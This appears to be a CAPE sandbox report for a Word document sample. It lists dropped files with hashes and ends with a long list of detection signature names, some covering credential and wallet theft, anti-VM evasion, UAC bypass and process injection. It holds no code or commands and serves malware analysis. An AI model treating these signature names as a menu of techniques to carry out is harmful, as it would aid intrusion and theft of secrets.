MD5 f7d0f1535f460d5e82a2eb8e0467d7f0
SHA1 e98341334099b25a5a55cf8eeb396b513ec66107
SHA256 c702e3571e8f9176192e2cd3b6764254406f51fe04b95b9d59d8d5f67431b21a
CRC32 BE10DD64
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNsXztl:O905TZzSWfbUYvnsXxl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name B5A32F2.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 0e84ea76d84c558d3be649c6550ced52
SHA1 61f073fba7dacbadba490fa05fce739bd3f1e474
SHA256 509420dc61926cbb6fec6508491713eda5e833011fdc69fd2a0c9b9f475b7574
CRC32 FC2CF924
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNlztl:O905TZzSWfbUYvnlxl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name BBT2PZNY16H6UO4BLGV1.temp
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBT2PZNY16H6UO4BLGV1.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File Size 8016 bytes
File Type data
MD5 23e45f83b252ea16742589490d1f00a6
SHA1 6cb492e9e79666b8e81a3fd7004367d31f341707
SHA256 916da09fe86ab13bf01a57451a5ec9ea88b6f9acd4eb53efc561c0b85571426b
CRC32 4E3CB4EA
Ssdeep 96:sqCUdMqY4+qvsqvJCwor1aqCUdMqY4+qvsEHyqvJCwort1CCX3MbH8bIxCXAlUVP:sE1or1aEdHnort1CCZbIxClQe
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name GDIPFONTCACHEV1.DAT
Associated Filenames
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
File Size 86096 bytes
File Type data
MD5 1bba2e8a1b56ec52dd7805093b4839d3
SHA1 8d507ec6e5c4af348304f38c85227cbdca17a1f3
SHA256 2df0e9bc46893be214dc9da3ce78ba97b4176ee761ec3f38f0139297490f5341
CRC32 AEF024B5
Ssdeep 768:3v4h0tHgTlF1AphohIqrT43MTxK8PU/NBxZysNAp:Qh0tHgTlF1AphADhTxK8PU/NBD6p
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name CUSTOM.DIC
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
File Size 2 bytes
File Type Little-endian UTF-16 Unicode text, with no line terminators
MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
CRC32 88F83096
Ssdeep 3:Qn:Qn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
\xff\xfe
File name ~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
File Size 1024 bytes
File Type data
MD5 5d4d94ee7e06bbb0af9584119797b23a
SHA1 dbb111419c704f116efa8e72471dd83e86e49677
SHA256 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
CRC32 23C03491
Ssdeep 3:ol3lYdn:4Wn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Word14.customUI
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
File Size 3513 bytes
File Type Microsoft OOXML
MD5 b022439244ee91625c99a91c666eb0fb
SHA1 84a647b0bc5457c74c631361e8fad1dadd0852c8
SHA256 2a439ab0ccf43f70f80f6b929f9ea29ac6a6666b9abce9921105dc72e7fda8ca
CRC32 CC7E186E
Ssdeep 48:9mV5NrJ54E1SO6xLfUMcZ0BIKoGn5FxwYzZX2ynWM2d8gy7znl:UV5RJ4xFOYtXl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
File Size 125952 bytes
File Type Composite Document File V2 Document, No summary info
MD5 b376740ceedd1192ca33a7f306b188a4
SHA1 9201a92f34f4876a2e295ae4f116aa322536ff44
SHA256 fdf6f108d231b6107cc2e75d94c4902ee0835719cff6293d6e4b025689229cd8
CRC32 855EA49D
Ssdeep 3072:RlT4uL3BZ6E01JH1WMWB4xw9DeGC4+g3FbOfudn:Hn4JH1O5DeGC4+g3xOfKn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name tmpjlr0l6ur.doc
Associated Filenames
C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc
File Size 216576 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Re-contextualized, Subject: TCP, Author: Delmer Reichert, Keywords: Japan, Comments: Small Soft Towels, Template: Normal.dotm, Last Saved By: Arjun Flatley, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 21:38:00 2019, Last Saved Time/Date: Tue Oct 8 21:38:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5 3c97fd74bbe556ed5e5d00b0176e79f8
SHA1 ccab819281040378fe6c825d0703fc5bac79f149
SHA256 6743e819a34e26290e4b9e7692ff5a063cdc0d48cc87f6c77fb3c28097db79e4
CRC32 7725EB06
Ssdeep 6144:cGdugICAs3MXPxTqfVh6qYn4JH1O5DeWje6:cGdugIE3WxTqfbNNJH0FeWj
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 47.808 seconds )

  • 45.599 BehaviorAnalysis
  • 0.792 CAPE
  • 0.473 Dropped
  • 0.36 Static
  • 0.345 Deduplicate
  • 0.105 TargetInfo
  • 0.099 TrID
  • 0.014 Strings
  • 0.012 NetworkAnalysis
  • 0.007 AnalysisInfo
  • 0.002 Debug

Signatures ( 10.266 seconds )

  • 1.825 stealth_timeout
  • 1.757 api_spamming
  • 1.445 decoy_document
  • 1.408 NewtWire Behavior
  • 0.627 antivm_generic_scsi
  • 0.55 antiav_detectreg
  • 0.488 antidbg_windows
  • 0.301 antivm_generic_services
  • 0.193 infostealer_ftp
  • 0.147 uac_bypass_eventvwr
  • 0.114 antianalysis_detectreg
  • 0.107 infostealer_im
  • 0.102 recon_programs
  • 0.073 mimics_filetime
  • 0.066 Doppelganging
  • 0.058 antivm_vbox_keys
  • 0.057 stealth_file
  • 0.044 antivm_generic_disk
  • 0.039 antivm_vmware_keys
  • 0.038 bootkit
  • 0.036 recon_fingerprint
  • 0.033 virus
  • 0.031 kibex_behavior
  • 0.029 antivm_parallels_keys
  • 0.029 antivm_xen_keys
  • 0.028 darkcomet_regkeys
  • 0.027 antivm_vbox_window
  • 0.023 hancitor_behavior
  • 0.022 betabot_behavior
  • 0.022 antisandbox_script_timer
  • 0.021 InjectionCreateRemoteThread
  • 0.021 antiav_detectfile
  • 0.021 geodo_banking_trojan
  • 0.02 injection_createremotethread
  • 0.019 antivm_generic_diskreg
  • 0.019 antivm_vpc_keys
  • 0.018 injection_runpe
  • 0.017 InjectionProcessHollowing
  • 0.014 InjectionInterProcess
  • 0.014 infostealer_bitcoin
  • 0.013 antiemu_wine_func
  • 0.013 dynamic_function_loading
  • 0.012 malicious_dynamic_function_loading
  • 0.012 persistence_autorun
  • 0.011 antidebug_guardpages
  • 0.011 exploit_heapspray
  • 0.011 infostealer_browser_password
  • 0.011 kovter_behavior
  • 0.011 ransomware_files
  • 0.009 antivm_xen_keys
  • 0.009 antivm_hyperv_keys
  • 0.009 bypass_firewall
  • 0.009 packer_armadillo_regkey
  • 0.009 remcos_regkeys
  • 0.008 stack_pivot
  • 0.008 exploit_getbasekerneladdress
  • 0.008 antivm_vbox_files
  • 0.007 infostealer_browser
  • 0.007 antivm_generic_bios
  • 0.007 antivm_generic_cpu
  • 0.007 antivm_generic_system
  • 0.006 antivm_vbox_libs
  • 0.006 antiav_avast_libs
  • 0.006 exploit_gethaldispatchtable
  • 0.006 shifu_behavior
  • 0.006 browser_security
  • 0.005 office_flash_load
  • 0.005 antisandbox_sleep
  • 0.005 disables_browser_warn
  • 0.005 ransomware_extensions
  • 0.004 Vidar Behavior
  • 0.004 antisandbox_sunbelt_libs
  • 0.004 EvilGrab
  • 0.004 Raccoon Behavior
  • 0.004 InjectionSetWindowLong
  • 0.003 hawkeye_behavior
  • 0.003 injection_explorer
  • 0.003 antisandbox_sboxie_libs
  • 0.003 exec_crash
  • 0.003 neshta_files
  • 0.003 antiav_bitdefender_libs
  • 0.003 antianalysis_detectfile
  • 0.003 antidbg_devices
  • 0.002 persistence_registry_script
  • 0.002 stack_pivot_file_created
  • 0.002 tinba_behavior
  • 0.002 network_tor
  • 0.002 rat_nanocore
  • 0.002 persistence_bootexecute
  • 0.002 rat_luminosity
  • 0.002 RegBinary
  • 0.002 TransactedHollowing
  • 0.002 ipc_namedpipe
  • 0.002 dyre_behavior
  • 0.002 persistence_autorun_tasks
  • 0.002 antiemu_wine_reg
  • 0.002 antivm_vbox_devices
  • 0.002 antivm_vmware_files
  • 0.002 browser_addon
  • 0.002 modify_proxy
  • 0.002 rat_pcclient
  • 0.001 lsass_credential_dumping
  • 0.001 banker_prinimalka
  • 0.001 sets_autoconfig_url
  • 0.001 Sodinokibi Behavior
  • 0.001 dridex_behavior
  • 0.001 antivm_vmware_libs
  • 0.001 gootkit_behavior
  • 0.001 modifies_desktop_wallpaper
  • 0.001 Locky_behavior
  • 0.001 creates_largekey
  • 0.001 kazybot_behavior
  • 0.001 h1n1_behavior
  • 0.001 encrypted_ioc
  • 0.001 PlugX
  • 0.001 vawtrak_behavior
  • 0.001 cerber_behavior
  • 0.001 bot_drive
  • 0.001 codelux_behavior
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 office_martian_children
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 network_torgateway
  • 0.001 office_macro
  • 0.001 persistence_shim_database
  • 0.001 recon_checkip
  • 0.001 sniffer_winpcap
  • 0.001 stealth_hiddenreg
  • 0.001 stealth_hide_notifications
  • 0.001 targeted_flame

Reporting ( 0.223 seconds )

  • 0.223 CompressResults
Task ID 94394
Mongo ID 5d9e78bbc3c009112d67cdf7
Cuckoo release 1.3-CAPE
Delete